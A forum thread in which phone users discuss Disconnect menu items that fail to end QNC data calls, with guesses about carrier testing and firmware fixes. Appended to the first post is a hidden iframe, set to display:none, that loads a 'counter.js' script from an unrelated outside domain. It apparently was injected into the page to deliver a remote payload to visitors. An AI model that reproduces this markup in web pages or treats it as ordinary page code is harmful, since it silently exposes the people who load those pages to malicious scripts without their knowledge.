+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Fully Converged rlwhitt's Avatar
    Join Date
    11-05-2002
    Posts
    821

    "Disconnect" on menu not working?

    Anyone else notice on their phone that no Disconnect menu items actually cause a QNC call to disconnect? This is my experience in any programs that I've tried so far that have such a menu item, and I always have to use the phone keypad disconnect.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    I too have noticed this on many, but not all apps.
    ~'kito
    pdaPhoneHome Moderator

  3. #3
    Registered User
    Join Date
    12-20-2002
    Posts
    33
    Not only that, but for programs like Eurora, the "Disconnect after send/check" option does NOT seem to work . Has anyone been able to figure this out yet? It's really annoying as I ALWAYS forget to disconnect from the call.
    Thx,
    Brian

  4. #4
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    I have never had it fail to disconnect, but it certainly takes a long time to disconnect. Particularly from a dormant mode EN connection.

    Alan

  5. #5
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Originally posted by alanb
    I have never had it fail to disconnect, but it certainly takes a long time to disconnect. Particularly from a dormant mode EN connection.

    Alan
    Same here; Disconnect works from all of the apps I've tried it on, though it sometimes takes awhile.

  6. #6
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    It's a conspiracy with the carriers, so that it eats up a lot more minutes.
    ~'kito
    pdaPhoneHome Moderator

  7. #7
    Registered User
    Join Date
    12-20-2002
    Posts
    33
    I am still using QNC, and none of the apps ever disconnect when going to the menu item. Does anyone else here using QNC have this problem? Or does it totally work for you?
    Thx,
    Brian

  8. #8
    Fully Converged rlwhitt's Avatar
    Join Date
    11-05-2002
    Posts
    821
    I'm using QNC, and it never disconnects, no matter how long I wait. I consider this a pretty major and obvious bug to have gotten past Verizon's "rigorous" testing. Doh! Can you hear me now?

    Originally posted by briansin
    I am still using QNC, and none of the apps ever disconnect when going to the menu item. Does anyone else here using QNC have this problem? Or does it totally work for you?
    Thx,
    Brian

  9. #9
    Registered User
    Join Date
    12-20-2002
    Posts
    33
    I agree Rick. Do you know of a good place to report this to? Maybe we can get a fix for it in subsequent firmware updates?

  10. #10
    Fully Converged rlwhitt's Avatar
    Join Date
    11-05-2002
    Posts
    821
    Sure don't - I've never felt the need with the 6035!

    Perhaps if Hotsync is listening he knows, he seems to be pretty familiar with the process through beta testing.

    Originally posted by briansin
    I agree Rick. Do you know of a good place to report this to? Maybe we can get a fix for it in subsequent firmware updates?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts